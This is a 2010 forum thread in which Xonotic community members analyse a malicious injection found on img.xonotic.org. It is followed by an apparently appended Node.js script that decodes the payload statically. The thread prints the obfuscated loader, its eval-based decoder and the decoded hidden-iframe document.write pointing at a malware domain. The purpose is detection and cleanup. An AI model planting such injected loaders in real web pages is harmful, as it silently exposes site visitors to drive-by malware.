Xonotic Forums
img.xonotic.org Infected again - Printable Version

+- Xonotic Forums (https://forums.xonotic.org)
+-- Forum: Community (https://forums.xonotic.org/forumdisplay.php?fid=6)
+--- Forum: Off Topic (https://forums.xonotic.org/forumdisplay.php?fid=15)
+--- Thread: img.xonotic.org Infected again (/showthread.php?tid=931)



img.xonotic.org Infected again - Silica Gel: Do Not Eat - 09-04-2010

Looks like img.xonotic.org is infected again

There is code on the top of the page that is pointing to a malicious URL.
Undecided


RE: img.xonotic.org Infected again - clanclanclan - 09-04-2010

On the topic of img.xonotic.org, what on earth is

Code:
<xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm x34tnshrmluywitnshrmdx34tnshrmluyttnshrmh="x3tnshrm4luytnshrm1" heitnshrmx34lutnshrmyghtnshrmt="1xtnshrm34luytnshrm" bortnshrmdx34tnshrmluytnshrmer="tnshrm0" xtnshrm34lutnshrmyfratnshrmmx34ltnshrmuyetnshrmbortnshrmdx34ltnshrmuyertnshrm="0xtnshrm34ltnshrmuy" srtnshrmx34tnshrmluytnshrmc="httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp">tnshrmx34tnshrmluyx34ltnshrmuy')tnshrm;x3tnshrm4luytnshrm</xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm>

That might be what's causing it.


RE: img.xonotic.org Infected again - Silica Gel: Do Not Eat - 09-04-2010

(09-04-2010, 06:44 PM)clanclanclan Wrote: On the topic of img.xonotic.org, what on earth is

Code:
<xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm x34tnshrmluywitnshrmdx34tnshrmluyttnshrmh="x3tnshrm4luytnshrm1" heitnshrmx34lutnshrmyghtnshrmt="1xtnshrm34luytnshrm" bortnshrmdx34tnshrmluytnshrmer="tnshrm0" xtnshrm34lutnshrmyfratnshrmmx34ltnshrmuyetnshrmbortnshrmdx34ltnshrmuyertnshrm="0xtnshrm34ltnshrmuy" srtnshrmx34tnshrmluytnshrmc="httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp">tnshrmx34tnshrmluyx34ltnshrmuy')tnshrm;x3tnshrm4luytnshrm</xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm>

That might be what's causing it.

Replace All "tnshrm" with nothing and then
Replace All "x34luy" with nothing you get :
Code:
document.write('<iframe width=1 height=1 border=0 frameborder=0 src="http://workgroupsite.com/2tx/index.php"></iframe>')

I suspect that someone that has ftp access to img.xonotic.org has ftp password stealing malware on their pc.
I came across this recently where malware steals stored ftp credentials and uses it to infect websites.


RE: img.xonotic.org Infected again - clanclanclan - 09-05-2010

http://www.malwaredomainlist.com/mdl.php, look at the "workgroupsite.com" entry. Definitely malware :/

Edit: Wgetted the site (didn't visit it so I don't know what it does to browsers) and it looks like/is a clone of Google.


RE: img.xonotic.org Infected again - Minkovsky - 09-05-2010

(09-05-2010, 12:45 AM)clanclanclan Wrote: http://www.malwaredomainlist.com/mdl.php, look at the "workgroupsite.com" entry. Definitely malware :/

Edit: Wgetted the site (didn't visit it so I don't know what it does to browsers) and it looks like/is a clone of Google.

Run a dummy XP virtual machine (best on a computer you don't mind formatting afterwards, if sandboxing fails) if you want to see more. I've seen people on youtube doing this to show fake AVs and other bad stuff. Why XP? A lot of viruses are targeting that system.


RE: img.xonotic.org Infected again - PinkRobot - 09-05-2010

Also: maybe the person who is causing this problem is using the very popular free FTP program FileZilla and stores the passwords in the program (by adding the site in the Site Manager). FileZilla appears to be vulnerable to certain malware being able to read the contents of the password file and sending it to someone else, who then sells the passes to people who do stuff like the above. The safest way to use FileZilla on Windows, but maybe also other platforms, is to not store the passwords, but to use Quick Connect. It's a little more work, but much safer.


RE: img.xonotic.org Infected again - rainerzufalldererste - 09-05-2010

Code:
<div style='visibility:hidden;' id='j3ak74yf'>xtnshrm34ltnshrmuydoctnshrmumx34tnshrmluyentnshrmtx34ltnshrmuy.tnshrmwritnshrmx34tnshrmluytetnshrm('<xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm x34tnshrmluywitnshrmdx34tnshrmluyttnshrmh=x3tnshrm4luytnshrm1 heitnshrmx34lutnshrmyghtnshrmt=1xtnshrm34luytnshrm bortnshrmdx34tnshrmluytnshrmer=tnshrm0 xtnshrm34lutnshrmyfratnshrmmx34ltnshrmuyetnshrmbortnshrmdx34ltnshrmuyertnshrm=0xtnshrm34ltnshrmuy srtnshrmx34tnshrmluytnshrmc="httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp">tnshrmx34tnshrmluy</ixtnshrm34ltnshrmuyfratnshrmx34lutnshrmymetnshrm>x34ltnshrmuy')tnshrm;x3tnshrm4luytnshrm</div>

...doesn't seem to be named like this by a company or admin!
...it looks like it's repeating itself :S

Code:
// marked is the following

xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm

x3tnshrm4luytnshrm1

1xtnshrm34luytnshrm

tnshrm0

0xtnshrm34ltnshrmuy

"httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp"

ixtnshrm34ltnshrmuyfratnshrmx34lutnshrmymetnshrm

the parts
Code:
x3tnshrm4luytnshrm1

and
Code:
1xtnshrm34luytnshrm
seem to repeat themselves perfectly with only some letters' positions changed!

..//\\
//||\\
...||
...||

INFECTED!?


RE: img.xonotic.org Infected again - Silica Gel: Do Not Eat - 09-05-2010

(09-05-2010, 12:02 PM)rainerzufalldererste Wrote:
Code:
<div style='visibility:hidden;' id='j3ak74yf'>xtnshrm34ltnshrmuydoctnshrmumx34tnshrmluyentnshrmtx34ltnshrmuy.tnshrmwritnshrmx34tnshrmluytetnshrm('<xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm x34tnshrmluywitnshrmdx34tnshrmluyttnshrmh=x3tnshrm4luytnshrm1 heitnshrmx34lutnshrmyghtnshrmt=1xtnshrm34luytnshrm bortnshrmdx34tnshrmluytnshrmer=tnshrm0 xtnshrm34lutnshrmyfratnshrmmx34ltnshrmuyetnshrmbortnshrmdx34ltnshrmuyertnshrm=0xtnshrm34ltnshrmuy srtnshrmx34tnshrmluytnshrmc="httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp">tnshrmx34tnshrmluy</ixtnshrm34ltnshrmuyfratnshrmx34lutnshrmymetnshrm>x34ltnshrmuy')tnshrm;x3tnshrm4luytnshrm</div>

...doesn't seem to be named like this by a company or admin!
...it looks like it's repeating itself :S

Code:
// marked is the following

xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm

x3tnshrm4luytnshrm1

1xtnshrm34luytnshrm

tnshrm0

0xtnshrm34ltnshrmuy

"httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp"

ixtnshrm34ltnshrmuyfratnshrmx34lutnshrmymetnshrm

the parts
Code:
x3tnshrm4luytnshrm1

and
Code:
1xtnshrm34luytnshrm
seem to repeat themselves perfectly with only some letters' positions changed!

..//\\
//||\\
...||
...||

INFECTED!?

The following code replaces "tnshrm" with nothing
and then "x34luy" with nothing.

Code:
    var xsry8w5 = $('div#j3ak74yf').html().replace(/tnshrm/g, '');
    var Rtmbpm0 = eval(String.fromCharCode(215-114,614-496,518-421,597-489));
    Rtmbpm0(xsry8w5.replace(/x34luy/g, ''));

Which results in
Code:
document.write('<iframe width=1 height=1 border=0 frameborder=0 src="http://workgroupsite.com/2tx/index.php"></iframe>')
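The two decodes in this thread (Silica Gel's manual "Replace All" above and the loader's own `replace()` calls) can be reproduced statically, which is how a responder would want to pull the injected URL out of a compromised page without ever running the payload. The following is an added example, not code from the thread or from the injected loader: a Node.js script that repeats the loader's two substring removals in the same order, resolves the `String.fromCharCode(215-114,...)` arithmetic by hand instead of calling `eval`, and extracts the iframe target for blocking and log hunting. The hidden-div body and the loader line are copied from the posts above; the function names (`stripJunk`, `decodeFromCharCode`, `extractIframeSrc`, `analyseInjection`) are my own.

```javascript
// Added example (not code from the thread or from the injected loader): a
// static de-obfuscator for the hidden-div payload posted above. It never
// runs the payload; it repeats the loader's two substring removals and
// resolves the String.fromCharCode arithmetic by hand, so a responder can
// recover the injected URL offline. Function names are my own.

// Order matters: every "x34luy" in the payload is itself split by "tnshrm",
// so the second token only appears once the first one has been removed.
const JUNK_TOKENS = ["tnshrm", "x34luy"];

// Inner text of <div id='j3ak74yf'> exactly as posted in the thread.
const HIDDEN_DIV_BODY = `xtnshrm34ltnshrmuydoctnshrmumx34tnshrmluyentnshrmtx34ltnshrmuy.tnshrmwritnshrmx34tnshrmluytetnshrm('<xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm x34tnshrmluywitnshrmdx34tnshrmluyttnshrmh=x3tnshrm4luytnshrm1 heitnshrmx34lutnshrmyghtnshrmt=1xtnshrm34luytnshrm bortnshrmdx34tnshrmluytnshrmer=tnshrm0 xtnshrm34lutnshrmyfratnshrmmx34ltnshrmuyetnshrmbortnshrmdx34ltnshrmuyertnshrm=0xtnshrm34ltnshrmuy srtnshrmx34tnshrmluytnshrmc="httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp">tnshrmx34tnshrmluy</ixtnshrm34ltnshrmuyfratnshrmx34lutnshrmymetnshrm>x34ltnshrmuy')tnshrm;x3tnshrm4luytnshrm`;

// The loader's second line, as posted in the thread.
const LOADER_SINK =
  "var Rtmbpm0 = eval(String.fromCharCode(215-114,614-496,518-421,597-489));";

// Mirror the loader's replace(/tok/g, '') calls with split/join, so no
// regex escaping is needed if a future variant uses metacharacters.
function stripJunk(text, tokens = JUNK_TOKENS) {
  return tokens.reduce((acc, tok) => acc.split(tok).join(""), text);
}

// Resolve String.fromCharCode(a-b, c-d, ...) arithmetically. Each argument
// must be an integer or a difference of two integers; anything else is
// rejected rather than evaluated.
function decodeFromCharCode(snippet) {
  const m = /String\.fromCharCode\(([^)]*)\)/.exec(snippet);
  if (!m) return null;
  const codes = m[1].split(",").map((term) => {
    const parts = term.trim().split("-").map(Number);
    if (parts.length > 2 || parts.some(Number.isNaN)) {
      throw new Error("unsupported fromCharCode term: " + term);
    }
    return parts.length === 1 ? parts[0] : parts[0] - parts[1];
  });
  return String.fromCharCode(...codes);
}

// Pull the iframe target out of the decoded document.write() argument.
function extractIframeSrc(decoded) {
  const m = /<iframe\b[^>]*\bsrc=["']?([^"'\s>]+)/i.exec(decoded);
  return m ? m[1] : null;
}

// One report per injected snippet: the decoded string, the function the
// loader hands it to, and the URL to block and hunt for in proxy logs.
function analyseInjection(divBody, loaderLine) {
  const decoded = stripJunk(divBody);
  return {
    decoded,
    sink: decodeFromCharCode(loaderLine),
    usesDocumentWrite: /^document\.write\(/.test(decoded),
    iframeSrc: extractIframeSrc(decoded),
  };
}

console.log(JSON.stringify(analyseInjection(HIDDEN_DIV_BODY, LOADER_SINK), null, 2));
```

Running it prints the decoded `document.write('<iframe ... src="http://workgroupsite.com/2tx/index.php"></iframe>');` string, reports that the loader resolves its `String.fromCharCode` call to `eval`, and returns the iframe URL as the indicator to block. The same `stripJunk` pass also decodes the quoted-attribute variant clanclanclan posted, since the junk tokens and their order are identical.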